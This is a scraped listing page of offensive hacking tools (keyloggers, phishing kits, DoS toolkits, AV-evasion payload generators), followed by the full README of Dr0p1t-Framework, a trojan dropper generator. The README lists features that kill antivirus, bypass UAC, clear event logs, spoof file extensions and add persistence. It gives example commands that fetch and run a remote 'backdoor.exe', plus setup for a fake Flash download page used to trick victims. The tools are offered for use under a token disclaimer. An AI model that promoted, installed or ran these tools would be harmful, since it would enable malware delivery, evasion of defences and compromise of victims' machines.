Cheap and reliable Node.js hosting starts at $3/month, and $1/month static HTML hosting

Proton Framework is a Windows post-exploitation framework similar to other Windows post-exploitation frameworks. The major difference is that the Proton Framework does most of its operations using Windows Script Host, with compatibility in the core to support a default installation of Windows 2000 with no service packs all the way through Windows 10.

Stars: ✭ 142 (-87.46%)

Mutual labels: kali-linux, hacking, hacking-tool, backdoor

Thefatrat

Thefatrat a massive exploiting tool : Easy tool to generate backdoor and easy tool to post exploitation attack like browser attack and etc . This tool compiles a malware with popular payload and then the compiled malware can be execute on windows, android, mac . The malware that created with this tool also have an ability to bypass most AV softw…

Stars: ✭ 5,944 (+425.09%)

Mutual labels: kali-linux, hacking, malware, backdoor

Mouse

Mouse Framework is an iOS and macOS post-exploitation framework that gives you a command line session with extra functionality between you and a target machine using only a simple Mouse payload. Mouse gives you the power and convenience of uploading and downloading files, tab completion, taking pictures, location tracking, shell command execution, escalating privileges, password retrieval, and much more.

Stars: ✭ 186 (-83.57%)

Mutual labels: kali-linux, hacking, hacking-tool, backdoor

Phonia

Phonia Toolkit is one of the most advanced toolkits to scan phone numbers using only free resources. The goal is to first gather standard information such as country, area, carrier and line type on any international phone numbers with a very good accuracy.

Stars: ✭ 221 (-80.48%)

Mutual labels: kali-linux, hacking, hacking-tool, social-engineering

Maskphish

Give a Mask to Phishing URL like a PRO.. A MUST have tool for Phishing.

Stars: ✭ 370 (-67.31%)

Mutual labels: kali-linux, hacking-tool, phishing, social-engineering

Technowlogger

TechNowLogger is Windows/Linux Keylogger Generator which sends key-logs via email with other juicy target info

Stars: ✭ 172 (-84.81%)

Mutual labels: persistence, kali-linux, hacking, pentest

VirusX5

The Most Powerful Fake Page Redirecting tool...

Stars: ✭ 15 (-98.67%)

Mutual labels: phishing, kali-linux, hacking-tool, social-engineering

Pentesting Bible

Learn ethical hacking.Learn about reconnaissance,windows/linux hacking,attacking web technologies,and pen testing wireless networks.Resources for learning malware analysis and reverse engineering.

Stars: ✭ 8,981 (+693.37%)

Mutual labels: kali-linux, hacking, malware, hacking-tool

Quack

Quack Toolkit is a set of tools to provide denial of service attacks. Quack Toolkit includes SMS attack tool, HTTP attack tool and many other attack tools.

Stars: ✭ 305 (-73.06%)

Mutual labels: kali-linux, hacking, hacking-tool, social-engineering

Xeexe Topantivirusevasion

Undetectable & Xor encrypting with custom KEY (FUD Metasploit Rat) bypass Top Antivirus like BitDefender,Malwarebytes,Avast,ESET-NOD32,AVG,... & Automatically Add ICON and MANIFEST to excitable

Stars: ✭ 387 (-65.81%)

Mutual labels: hacking, malware, hacking-tool, backdoor

Hacktheworld

An Python Script For Generating Payloads that Bypasses All Antivirus so far .

Stars: ✭ 527 (-53.45%)

Mutual labels: hacking, malware, backdoor

Onex

onex is a hacking tool installer and package manager for hackers. Onex is a library of all hacking tools for Termux and other Linux distributions. onex can install any third party tool or any hacking tool for you.

Stars: ✭ 537 (-52.56%)

Mutual labels: kali-linux, hacking, hacking-tool

Impulse

💣 Impulse Denial-of-service ToolKit

Stars: ✭ 538 (-52.47%)

Mutual labels: kali-linux, hacking, hacking-tool

Saint

👁 (s)AINT is a Spyware Generator for Windows systems written in Java. [Discontinued]

Stars: ✭ 522 (-53.89%)

Mutual labels: persistence, hacking, hacking-tool

Powershell Rat

Python based backdoor that uses Gmail to exfiltrate data through attachment. This RAT will help during red team engagements to backdoor any Windows machines. It tracks the user activity using screen capture and sends it to an attacker as an e-mail attachment.

Stars: ✭ 636 (-43.82%)

Mutual labels: hacking, hacking-tool, backdoor

Shuffle

WebShell Backdoor Framework

Stars: ✭ 11 (-99.03%)

Mutual labels: hacking, hacking-tool, backdoor

Ghost

Ghost Framework is an Android post-exploitation framework that exploits the Android Debug Bridge to remotely access an Android device. Ghost Framework gives you the power and convenience of remote Android device administration.

Stars: ✭ 992 (-12.37%)

Mutual labels: kali-linux, hacking, backdoor

Thc Archive

All releases of the security research group (a.k.a. hackers) The Hacker's Choice

Stars: ✭ 474 (-58.13%)

Mutual labels: hacking, pentest, hacking-tool

Jok3r

Jok3r v3 BETA 2 - Network and Web Pentest Automation Framework

Stars: ✭ 645 (-43.02%)

Mutual labels: hacking, pentest, hacking-tool

View All Similar Projects ➔

Not maintained currently (Wait for the next version)

Dr0p1t-Framework

Have you ever heard about trojan droppers ? In short dropper is type of malware that downloads other malwares and Dr0p1t gives you the chance to create a stealthy dropper that bypass most AVs and have a lot of tricks ( Trust me :D ) ;)

Features

+ Generated executable properties:

The executable size is smaller compared to other droppers generated the same way.
Download executable on target system and execute it silently..
Self destruct function so that the dropper will kill and delete itself after finishing it work
Escape disk forensics by making all the files dropper create and dropper also cleans its content before deletion
Clear event log after finishing.

+ Framework properties:

Works with Windows, Linux and now have OSX support ( Thanks to @sm4sh3r )
Dr0p1t-Server feature (beta) so now you can work from browser See how to work with Dr0p1t-Server
Dr0p1t-Server have a scam option (beta) See how to work with Dr0p1t-Server

+ Modules:

Find and kill antivirus before running the malware.
The ability to disable UAC.
The ability to run your malware as admin.
Full spoof by spoofing the file icon and extension to any thing you want.
ZIP files support so now you can compress your executable to zip file before uploading.
Running a custom ( batch|powershell|vbs ) file you have chosen before running the executable
In running powershell scripts it can bypass execution policy
Using UPX to compress the dropper after creating it

+Persistence modules:

Adding executable after downloading it to startup.
Adding executable after downloading it to task scheduler ( UAC not matters ).
Adding your file to powershell user profile so your file will be downloaded and ran every time powershell.exe run if it doesn't exist.

Screenshots

On Windows

On Linux (Kali linux)

On OSX

Still not fully tested! Need some contributors and testers 😄

Help menu

Usage: Dr0p1t.py Malware_Url [Options]

options:
-h, --help      show this help message and exit
-s              Add your malware to startup (Persistence)
-t              Add your malware to task scheduler (Persistence)
-a              Add your link to powershell user profile (Persistence)
-k              Kill antivirus process before running your malware.
-b              Run this batch script before running your malware. Check scripts folder
-p              Run this powershell script before running your malware. Check scripts folder
-v              Run this vbs script before running your malware. Check scripts folder
--runas         Bypass UAC and run your malware as admin
--spoof         Spoof the final file to an extension you choose.
--zip           Tell Dr0p1t that the malware in the link is compressed as zip
--upx           Use UPX to compress the final file.
--nouac         Try to disable UAC on victim device
-i              Use icon to the final file. Check icons folder.
--noclearevent  Tell the framework to not clear the event logs on target machine after finish.
--nocompile     Tell the framework to not compile the final file.
--only32        Download your malware for 32 bit devices only
--only64        Download your malware for 64 bit devices only
-q              Stay quite ( no banner )
-u              Check for updates
-nd             Display less output information

Examples

./Dr0p1t.py Malware_Url [Options]
./Dr0p1t.py https://test.com/backdoor.exe -s -t -a -k --runas --upx
./Dr0p1t.py https://test.com/backdoor.exe -k -b block_online_scan.bat --only32
./Dr0p1t.py https://test.com/backdoor.exe -s -t -k -p Enable_PSRemoting.ps1 --runas
./Dr0p1t.py https://test.com/backdoor.zip -t -k --nouac -i flash.ico --spoof pdf --zip

Prerequisites

Python 2 or Python 3.

The recommended version for Python 2 is 2.7.x , the recommended version for Python 3 is 3.5.x and don't use 3.6 because it's not supported yet by PyInstaller

Needed dependencies for Linux

apt
Others will be installed from install.sh file

Note : You must have root access

Needed dependencies for windows

pip
Modules in windows_requirements.txt

Installation

There's a list here for all official videos for installing and using Dr0p1t Playlist

On Linux

git clone https://github.com/D4Vinci/Dr0p1t-Framework.git
chmod 777 -R Dr0p1t-Framework
cd Dr0p1t-Framework
sudo chmod +x install.sh
./install.sh
python Dr0p1t.py

On Windows (After downloading ZIP and upzip it)

cd Dr0p1t-Framework-master
python -m pip install -r windows_requirements.txt
python Dr0p1t.py

Note : in python 2.7 you don't have pip so install it first from get-pip.py script [Google it]

Tested on:

Kali Linux Rolling
Ubuntu 14.04-16.04 LTS
Windows 10/8.1/8

Work with Dr0p1t-Server

Note : Server is still in beta version and it have a lot of features to add and also a better design [ Need a designer to contribute :D ]

Prerequisites

Stable internet connection.
Port 5000 not used and firewall configured to not block connection from it

Installation & run server

On Linux and Windows it's the same after installing Dr0p1t by doing the steps mentioned above, install modules in server_requirements.txt by using pip like :

python -m pip install -r server_requirements.txt

Now let's run our server script :

python Dr0p1t_Server.py

After running the server script, it will start to listen to all the connection coming to port 5000 using flask.

Now to use the server from your device open in browser either 127.0.0.1:5000 or [Your IP]:5000.

To open it from other devices in LAN open [Your Local IP]:5000 and for other devices in WAN open [Your Global IP]:5000 but make sure first that you configured you router to forward port 5000 connection to you.

After opening the serve page you will see a simple website with a simple design asking you for data needed See server screenshots

Then submit the data then it will be verified through some processes then the exe file will be generated and you will be redirected to page telling you the scam link.

After entering the link you will see a scam to download the dropper which it by default Adobe flash download page. To replace the scam with yours replace the file "Scam.html" content with yours but remember the variables ( Don't remove it ).

Server screenshots

See more for Windows See more for Linux

No distribute scan ( Please don't scan with virus total:3 )

Todo Check out this link

Contact

Twitter

Donation

If this tool has been useful for you, feel free to thank me by buying me a coffee :)

Disclaimer

Dr0p1t Framework not responsible for misuse and for illegal purposes. Use it only for Pentest or educational purpose !!!

Copying a code from this framework or using it in another tool is accepted as you mention where you get it from 😄

Pull requests are always welcomed :D

Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].

Stars: ✭ 1,132

Visit Git Page 🔗Visit User Page 🔗Visit Issues Page (6) 🔗